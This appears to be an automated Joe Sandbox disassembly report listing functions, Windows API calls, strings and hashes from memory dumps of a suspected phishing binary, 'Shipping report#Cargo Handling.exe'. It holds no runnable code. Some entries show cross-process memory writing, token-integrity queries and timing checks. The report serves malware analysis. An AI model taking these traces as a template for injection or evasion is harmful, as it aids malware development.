Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0e452596fdf5aaa381eba1f0161c26b998d588a79bfad11d30484fa91ca3a950
Instruction ID: d6e76c0df76588f3d497156403a2deb9f5738aa7c0be7552905ae5ad8820bbc6
Opcode Fuzzy Hash: 0e452596fdf5aaa381eba1f0161c26b998d588a79bfad11d30484fa91ca3a950
Instruction Fuzzy Hash: CF012D36105B007BC62267746C85F6F159DFBD1371721442CF411B39D3EF308C514060

Function 000F000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?,?,000F035E), ref: 000F002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?), ref: 000F0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?), ref: 000F0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?), ref: 000F0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000EFF41,80070057,?,?), ref: 000F0070

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 0024c5e009336b832021f193a91d67efa3f22a079937e781af08f3a2787ede1e
Instruction ID: 0529060b8e94bf5f0ceee66f0fc8029a4c35f0be6c7401e5c618cd9da7d8f4ca
Opcode Fuzzy Hash: 0024c5e009336b832021f193a91d67efa3f22a079937e781af08f3a2787ede1e
Instruction Fuzzy Hash: 16018F72600208BFDB204F68DC04FBE7AEDEF44751F148128FA05D2611DB71DD91ABA0

Function 000FE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 000FE997
QueryPerformanceFrequency.KERNEL32(?), ref: 000FE9A5
Sleep.KERNEL32(00000000), ref: 000FE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 000FE9B7
Sleep.KERNEL32 ref: 000FE9F3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 72f3789d91259ddc04d46b468cd9aaa3fe6657abb58cce94e419d4fc2c851a89
Instruction ID: 5fc5ef979da63fdf06462a3fc61d348f0dfe2532e0664705934f7b711b06c607
Opcode Fuzzy Hash: 72f3789d91259ddc04d46b468cd9aaa3fe6657abb58cce94e419d4fc2c851a89
Instruction Fuzzy Hash: 21016D31C0566DEBCF509FE4DC496EDBB78FF09700F000556E602B2661DB7095A5D7A1

Function 000F10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F114D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 11337356f8e5b3e699a73d2a3bb71bcfe7ffc612c1afe035ec56c5d19f6caba1
Instruction ID: 394b937991fd754ed26a36efd816695bdadd35927da596c6c2957895b6a86648
Opcode Fuzzy Hash: 11337356f8e5b3e699a73d2a3bb71bcfe7ffc612c1afe035ec56c5d19f6caba1
Instruction Fuzzy Hash: 75016D79100205FFDB214F64DC49AAA3BAEFF85360B140414FB41C3350DB31DC519AA0

Function 000F0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000F0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000F0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000F0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000F0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000F1002

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c7bab5bee8b045f8b80a0e35eccaabe3b404fe24404bf44af7ce3d94e07d9576
Instruction ID: ee9189c07d0173e4aaefc3f79665e1a1bc0ea065bb617945fa8cf1cd1fa8e2f9
Opcode Fuzzy Hash: c7bab5bee8b045f8b80a0e35eccaabe3b404fe24404bf44af7ce3d94e07d9576
Instruction Fuzzy Hash: 9BF04F3A100305FBD7214FA49C4AF9A3BADEF89761F204414FB45C7651CA70DCA18AA0

Function 000F1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000F102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000F1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000F104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1062

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2c64c9ea896c3cd7b1b291dfccfbac7c6f9dcdc08a0c4637b68fa950fa9a4379
Instruction ID: 4f108ae43e611e3d253e1386c70de3324618bcc1dbf04694762018105d890000
Opcode Fuzzy Hash: 2c64c9ea896c3cd7b1b291dfccfbac7c6f9dcdc08a0c4637b68fa950fa9a4379
Instruction Fuzzy Hash: 3FF04939200305FBDB215FA4EC49FAA3BADEF89761F200424FB45C7650CA70D8A18AA0

Function 0010030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0010017D,?,001032FC,?,00000001,000D2592,?), ref: 00100324
CloseHandle.KERNEL32(?,?,?,?,0010017D,?,001032FC,?,00000001,000D2592,?), ref: 00100331
CloseHandle.KERNEL32(?,?,?,?,0010017D,?,001032FC,?,00000001,000D2592,?), ref: 0010033E
CloseHandle.KERNEL32(?,?,?,?,0010017D,?,001032FC,?,00000001,000D2592,?), ref: 0010034B
CloseHandle.KERNEL32(?,?,?,?,0010017D,?,001032FC,?,00000001,000D2592,?), ref: 00100358
CloseHandle.KERNEL32(?,?,?,?,0010017D,?,001032FC,?,00000001,000D2592,?), ref: 00100365

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b859dc998f64fb16abb0328746413cd7b2db2fe321f79e3d390c691227a4a768
Instruction ID: c235b986d09d2462e2af4d8183b50f01779bd806841439c1e0c2126e1f62962c
Opcode Fuzzy Hash: b859dc998f64fb16abb0328746413cd7b2db2fe321f79e3d390c691227a4a768
Instruction Fuzzy Hash: F401EA72800B019FCB32AF66D880902FBF9BF643163158A3FD19252970C3B1A998CF80

Function 000CD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000CD752

Part of subcall function 000C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000), ref: 000C29DE
Part of subcall function 000C29C8: GetLastError.KERNEL32(00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000,00000000), ref: 000C29F0

_free.LIBCMT ref: 000CD764
_free.LIBCMT ref: 000CD776
_free.LIBCMT ref: 000CD788
_free.LIBCMT ref: 000CD79A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 62b9260028607f2a79dc1fa325afac038af5d2bdb36a92f5d02e5d15df412bab
Instruction ID: 4827e22c7c8009c201d48cae855bebe9745d4c8f7d6ad8a0548621cc06921cfe
Opcode Fuzzy Hash: 62b9260028607f2a79dc1fa325afac038af5d2bdb36a92f5d02e5d15df412bab
Instruction Fuzzy Hash: CFF04F32548304AB8661EB64F9C5E5E77DDFB04311795091EF058EB902D730FC8086A0

Function 000F5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 000F5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 000F5C6F
MessageBeep.USER32(00000000), ref: 000F5C87
KillTimer.USER32(?,0000040A), ref: 000F5CA3
EndDialog.USER32(?,00000001), ref: 000F5CBD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1708dea7c324c1c323fe9f23dce32c158871d4267183b64ec2915fc03bc2b587
Instruction ID: ff4808eb8326240525b83281abcb76b7d56f0df71649aa288f730c9c30f430aa
Opcode Fuzzy Hash: 1708dea7c324c1c323fe9f23dce32c158871d4267183b64ec2915fc03bc2b587
Instruction Fuzzy Hash: 15016D30500B08AFEB305B10DD4EFAA77B8BF00B06F000559A783A19E1DBF4A9999AD0

Function 000C22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000C22BE

Part of subcall function 000C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000), ref: 000C29DE
Part of subcall function 000C29C8: GetLastError.KERNEL32(00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000,00000000), ref: 000C29F0

_free.LIBCMT ref: 000C22D0
_free.LIBCMT ref: 000C22E3
_free.LIBCMT ref: 000C22F4
_free.LIBCMT ref: 000C2305

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5ac39c0a0dff8c0fb0cd5f05012f6c29dadc4b35c88531bd246fd86b57b814e4
Instruction ID: a4d60a4d07c920aed162f457abf3e81c7fb3c695531a17460e0ed2144c33a112
Opcode Fuzzy Hash: 5ac39c0a0dff8c0fb0cd5f05012f6c29dadc4b35c88531bd246fd86b57b814e4
Instruction Fuzzy Hash: C9F0DA75841220AF8613AF58BC11E8D3BA5F718B61715054EF410D6EB2CBB10991EFE4

Function 000A95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 000A95D4
StrokeAndFillPath.GDI32(?,?,000E71F7,00000000,?,?,?), ref: 000A95F0
SelectObject.GDI32(?,00000000), ref: 000A9603
DeleteObject.GDI32 ref: 000A9616
StrokePath.GDI32(?), ref: 000A9631

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f0d1e980f26161e73dddcbaf6dca1f4dcb31add23defb2e701fa8f6b6ee8cb85
Instruction ID: 5fd50b0e90635200f05440ed12c87e61831aa7fcde4de0550881ce25869146e1
Opcode Fuzzy Hash: f0d1e980f26161e73dddcbaf6dca1f4dcb31add23defb2e701fa8f6b6ee8cb85
Instruction Fuzzy Hash: 36F03C34505704FBEB265FA5ED1D7A83BA5EB02326F088214F525558F0C7B089E2DFA4

Function 000C0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 000C10F9
__freea.LIBCMT ref: 000C1117

Part of subcall function 000C1537: _free.LIBCMT ref: 000C154F

Strings

am/pm, xrefs: 000C117A
a/p, xrefs: 000C11DE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: f85f660c3d7a0e28eaabe1624d69417212268e050b0ac49a315d277c5fdc3f81
Instruction ID: 3a6aa41ef3ba39e6506938a7ba3ecd2f4c80643da581f4af22373037e1b61af2
Opcode Fuzzy Hash: f85f660c3d7a0e28eaabe1624d69417212268e050b0ac49a315d277c5fdc3f81
Instruction Fuzzy Hash: E0D10F75900286DACB649F68C845FFEB7F1EF07304F28415EE901AB692D3759E81CB91

Function 00117B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 000B0242: EnterCriticalSection.KERNEL32(0016070C,00161884,?,?,000A198B,00162518,?,?,?,000912F9,00000000), ref: 000B024D
Part of subcall function 000B0242: LeaveCriticalSection.KERNEL32(0016070C,?,000A198B,00162518,?,?,?,000912F9,00000000), ref: 000B028A

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 000B00A3: __onexit.LIBCMT ref: 000B00A9

__Init_thread_footer.LIBCMT ref: 00117BFB

Part of subcall function 000B01F8: EnterCriticalSection.KERNEL32(0016070C,?,?,000A8747,00162514), ref: 000B0202
Part of subcall function 000B01F8: LeaveCriticalSection.KERNEL32(0016070C,?,000A8747,00162514), ref: 000B0235

Strings

Variable must be of type 'Object'., xrefs: 00117C3A
G, xrefs: 00117C7F
5, xrefs: 00117C78

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 75197df65cb8c23d6b9727575e08ed4c9c8d32c08a6f734a65b82ff9c567af7f
Instruction ID: 4f70a9892ce76a35d6f0c1cfbba0b5461d874cf922fe40ffaa79932428289343
Opcode Fuzzy Hash: 75197df65cb8c23d6b9727575e08ed4c9c8d32c08a6f734a65b82ff9c567af7f
Instruction Fuzzy Hash: 52917D74A04209EFCF18EF94D8919EDB7B2BF45300F148069F816AB392DB71AE85DB51

Function 000C5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JO, xrefs: 000C5BA8, 000C5C6C

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: JO
API String ID: 0-2356230762
Opcode ID: d02cd48ad482eabfe616ef7135b3b8ef217ea7d3d9a516cf0251c052a1181d9e
Instruction ID: 2e173160f400acfd42580e64374749a4a0dcf03fe962ee9202ec71a8381a9ec6
Opcode Fuzzy Hash: d02cd48ad482eabfe616ef7135b3b8ef217ea7d3d9a516cf0251c052a1181d9e
Instruction Fuzzy Hash: 5051BF79900A0AAFCB219FA4CD85FEEBFB8EF05312F14015DF405A7292D771A9819B61

Function 000F2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000FB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000F21D0,?,?,00000034,00000800,?,00000034), ref: 000FB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000F2760

Part of subcall function 000FB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000F21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 000FB3F8

Part of subcall function 000FB32A: GetWindowThreadProcessId.USER32(?,?), ref: 000FB355
Part of subcall function 000FB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000F2194,00000034,?,?,00001004,00000000,00000000), ref: 000FB365
Part of subcall function 000FB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000F2194,00000034,?,?,00001004,00000000,00000000), ref: 000FB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000F27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000F281A

Strings

@, xrefs: 000F2832

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c716aebed541fca4bdaa55e3926d56a865e52c018b139459f65333acd1ff9134
Instruction ID: 75e079e9ee9d1e2a9b1969c8beee2e6ceb2aeb0b65af57f4153af65be906e3f9
Opcode Fuzzy Hash: c716aebed541fca4bdaa55e3926d56a865e52c018b139459f65333acd1ff9134
Instruction Fuzzy Hash: F3413B7290021CBFDB10DBA4CD42AEEBBB8AF09700F004099FA55B7581DB706E85DFA1

Function 000C172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping report#Cargo Handling.exe,00000104), ref: 000C1769
_free.LIBCMT ref: 000C1834
_free.LIBCMT ref: 000C183E

Strings

C:\Users\user\Desktop\Shipping report#Cargo Handling.exe, xrefs: 000C1760, 000C1767, 000C1796, 000C17CE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe
API String ID: 2506810119-605871150
Opcode ID: aa9af2f5018901064823605f84f3e5d92c440df2df032839f925c07a933ecd9d
Instruction ID: abf3ff9c3512ce71204cc19eda08ed9a8d641b741e42c62b9bf6cbdccd57b1ca
Opcode Fuzzy Hash: aa9af2f5018901064823605f84f3e5d92c440df2df032839f925c07a933ecd9d
Instruction Fuzzy Hash: 01314175A44218BFDB21DF999C85EDEBBFCEB86710B64416EE404D7212DAB08A44CB90

Function 000FC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000FC306
DeleteMenu.USER32(?,00000007,00000000), ref: 000FC34C
